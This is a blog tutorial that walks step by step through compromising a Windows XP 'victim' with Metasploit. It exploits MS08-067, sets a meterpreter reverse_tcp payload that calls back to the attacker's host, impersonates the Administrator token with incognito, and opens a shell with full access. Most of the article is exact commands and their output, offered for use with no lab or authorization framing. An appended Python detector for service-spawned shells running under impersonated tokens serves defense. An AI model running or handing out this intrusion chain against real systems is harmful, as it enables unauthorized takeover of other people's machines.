Metasploit: Incognito Attack

July 14, 2015 | Views: 6347


Hi there,

This is Metasploit part 1. In a recent article, we learned about the basics and a little bit of configuration. Here, we’ll be a little more advanced.

Meterpreter

What’s Meterpreter? Meterpreter is Metasploit’s in-memory payload: it is injected into a process as a DLL and is mostly used to take control of a Windows host once an exploit has landed. Its command set lets us work around Windows security, make changes to the system and access it.

Points to note:

  • Meterpreter talks to its handler over TLS
  • Meterpreter can run commands, scripts and a shell on the victim and alter Windows features and events
  • Meterpreter uses a listener (handler) on our side to receive sessions, logs and events from the victim, which also lets it act as a backdoor

Incognito Attack

As the name suggests, this attack works quietly (it leaves no obvious signs of itself) and can be used to steal a session, i.e. to impersonate another logged-on user’s token.

Useful information: a Windows login with administrator rights is what we’re after; let’s assume the victim runs Windows XP Service Pack 2. We’re on the same LAN, or we at least know its IP (the recent article covered how to start msfcli / msfconsole / Metasploit). Let’s assume you’ve now opened msfconsole. Set the target with RHOST and look up the exploit named “ms08_067_netapi“ with search. To use an exploit, we know we need to type:

use exploit/<full path> (the full path can be found by typing search)

Next, type:

		msf> use exploit/windows/smb/ms08_067_netapi

It will show you that you’re using this exploit:

		msf exploit(ms08_067_netapi) >

Now, you need to see the options and set RHOST, or the configuration we talked about in a recent article:

	msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx

It will become:

	RHOST => xx.xx.xx.xx (this means our RHOST is set)

 

Let’s Use Payloads

Payloads: a payload is the code that runs on the victim after the exploit succeeds. It is a stand-alone component chosen separately from the exploit and works in sequence with it to take over the victim.

Each exploit has its own built-in default payload, but we can also pick our own.

Using payloads, let’s use meterpreter reverse TCP:

	msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

Hit enter and this will appear, meaning your exploit is set up, too:

	PAYLOAD => windows/meterpreter/reverse_tcp

Next, set LHOST (the local host that the payload connects back to and on which the session is created; that’s us, so we give our own IP):

	msf exploit(ms08_067_netapi) > set LHOST xx.xx.xx.xx
	LHOST => xx.xx.xx.xx

The configuration is complete; let’s see the targets/options and what we can do next:

	msf exploit(ms08_067_netapi) > show targets
	Exploit targets:
	   Id  Name                                 
	   --  ----                    
	   0   Automatic Targeting                           
	   1   Windows 2000 Universal                       
	   2   Windows XP SP0/SP1 Universal
	   3   Windows XP SP2 English (NX)
	   4   Windows XP SP3 English (NX)
	   5   Windows 2003 SP0 Universal 
	   6   Windows 2003 SP1 English (NO NX)
	   7   Windows 2003 SP1 English (NX)
	   8   Windows 2003 SP2 English (NO NX)
	   9   Windows 2003 SP2 English (NX)
	   10  Windows XP SP2 Arabic (NX)
	   11  Windows XP SP2 Chinese - Traditional / Taiwan (NX)

 

We have to choose the target that matches the victim’s OS. We can use Nmap / Zenmap (OS detection) to learn that information:

	msf exploit(ms08_067_netapi) > set TARGET 8
	target => 8

Let’s exploit:

	msf exploit(ms08_067_netapi) > exploit

		[*] Handler binding to LHOST 0.0.0.0
		[*] Started reverse handler
		[*] Triggering the vulnerability...
		[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
		[*] Sending stage (2650 bytes)
		[*] Sleeping before handling stage...
		[*] Uploading DLL (75787 bytes)...
		[*] Upload completed.
		[*] Meterpreter session 1 opened (xx.xx.xx.xx:xx -> xx.xx.xx.xx:xx)

		meterpreter >

Choose incognito

		meterpreter > use incognito

See more options for what we can do in incognito using help:

		meterpreter > help

		Command              Description                                             
		-------              -----------                                             
		add_group_user       Attempt to add a user to a global group with all tokens 
		add_localgroup_user  Attempt to add a user to a local group with all tokens  
		add_user             Attempt to add a user with all tokens                   
		impersonate_token    Impersonate specified token                             
		list_tokens          List tokens available under current user context        
		snarf_hashes         -----------

We have to look at the sessions/tokens available on the victim to pick one to impersonate. To list those tokens by user, type:

		meterpreter > list_tokens -u

		Delegation Tokens Available
		========================================
		NT AUTHORITY\LOCAL SERVICE
		NT AUTHORITY\NETWORK SERVICE
		NT AUTHORITY\SYSTEM
		Thinker\Administrator

		Impersonation Tokens Available
		========================================
		NT AUTHORITY\ANONYMOUS LOGON

 

We got the Administrator’s delegation token listed. Let’s take it. For impersonation, we pass the token name as HOST\\user, doubling the backslash so it reaches incognito intact:

		meterpreter > impersonate_token Thinker\\Administrator
		[+] Delegation token available
		[+] Successfully impersonated user Thinker\Administrator

Let’s see what we got here:

		meterpreter > getuid
		Server username: Thinker\Administrator

 

The last step: we need to start a Windows cmd. For that, type “execute -f cmd.exe -i -t”,
where -f names the program to run (cmd.exe), -i makes meterpreter interact with the new process and -t runs it with the currently impersonated token.

With shell, meterpreter gives us a command prompt on the victim with the access we now hold:

		meterpreter > shell
		Process 2804 created.
		Channel 1 created.
		Microsoft Windows XP [Version 5.1.2600]
		(C) Copyright 1985-2001 Microsoft Corp.

		C:\WINDOWS\system32> whoami
		whoami
		Thinker\administrator

		C:\WINDOWS\system32>

 

Voila! We’re now in the Windows system and have full access to it.
–Multi Thinker
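From the defender’s side, the chain above ends with a service process spawning cmd.exe under a different account than its own (the impersonated token). The following is an added example, not part of the original article, that flags that pattern over constructed process-creation records; the field names and the assumption that the MS08-067 Server service lives in svchost.exe as SYSTEM are the editor’s, not the page’s.

```python
"""Flag interactive shells that match the post-exploitation chain described above:
a network service host spawns cmd.exe, and the child runs under a different
account than its parent (token impersonation). The records are constructed
samples modelled on process-creation telemetry; field names are an assumption."""
from dataclasses import dataclass

SHELLS = {"cmd.exe", "powershell.exe"}
# Processes that host network-facing Windows services. The SMB Server service
# hit by MS08-067 runs inside svchost.exe as SYSTEM (assumption, see lead-in).
SERVICE_HOSTS = {"svchost.exe", "services.exe", "lsass.exe", "spoolsv.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    user: str           # account the new process runs as (HOST\user)
    parent_image: str   # full path of the parent process
    parent_user: str    # account the parent runs as


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    if basename(ev.image) not in SHELLS:
        return reasons
    if basename(ev.parent_image) in SERVICE_HOSTS:
        reasons.append("shell spawned by service host")
    if ev.user.lower() != ev.parent_user.lower():
        reasons.append("child runs under a different token than parent")
    return reasons


def suspicious_shells(events):
    """(pid, reasons) for every event that trips at least one rule."""
    return [(ev.pid, classify(ev)) for ev in events if classify(ev)]


SAMPLE_EVENTS = [  # constructed sample records
    ProcEvent(1234, r"C:\WINDOWS\system32\svchost.exe", r"NT AUTHORITY\SYSTEM",
              r"C:\WINDOWS\system32\services.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(2804, r"C:\WINDOWS\system32\cmd.exe", r"Thinker\Administrator",
              r"C:\WINDOWS\system32\svchost.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(3100, r"C:\WINDOWS\system32\cmd.exe", r"Thinker\Administrator",
              r"C:\WINDOWS\explorer.exe", r"Thinker\Administrator"),
]

if __name__ == "__main__":
    for pid, reasons in suspicious_shells(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

Only the cmd.exe born from svchost.exe as Thinker\Administrator is reported; the user's own cmd.exe under explorer.exe is not.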

7 Comments
  1. Good article, I learned about Incognito some weeks ago; this helped to improve my skills, thanks

  2. MS08_067 DOES NOT WORK FOR WIN 7, 8 AND 10.. YOU HAVE TO USE APPLICATION-BASED OR NETWORK-BASED EXPLOITS
    #LOVESK8
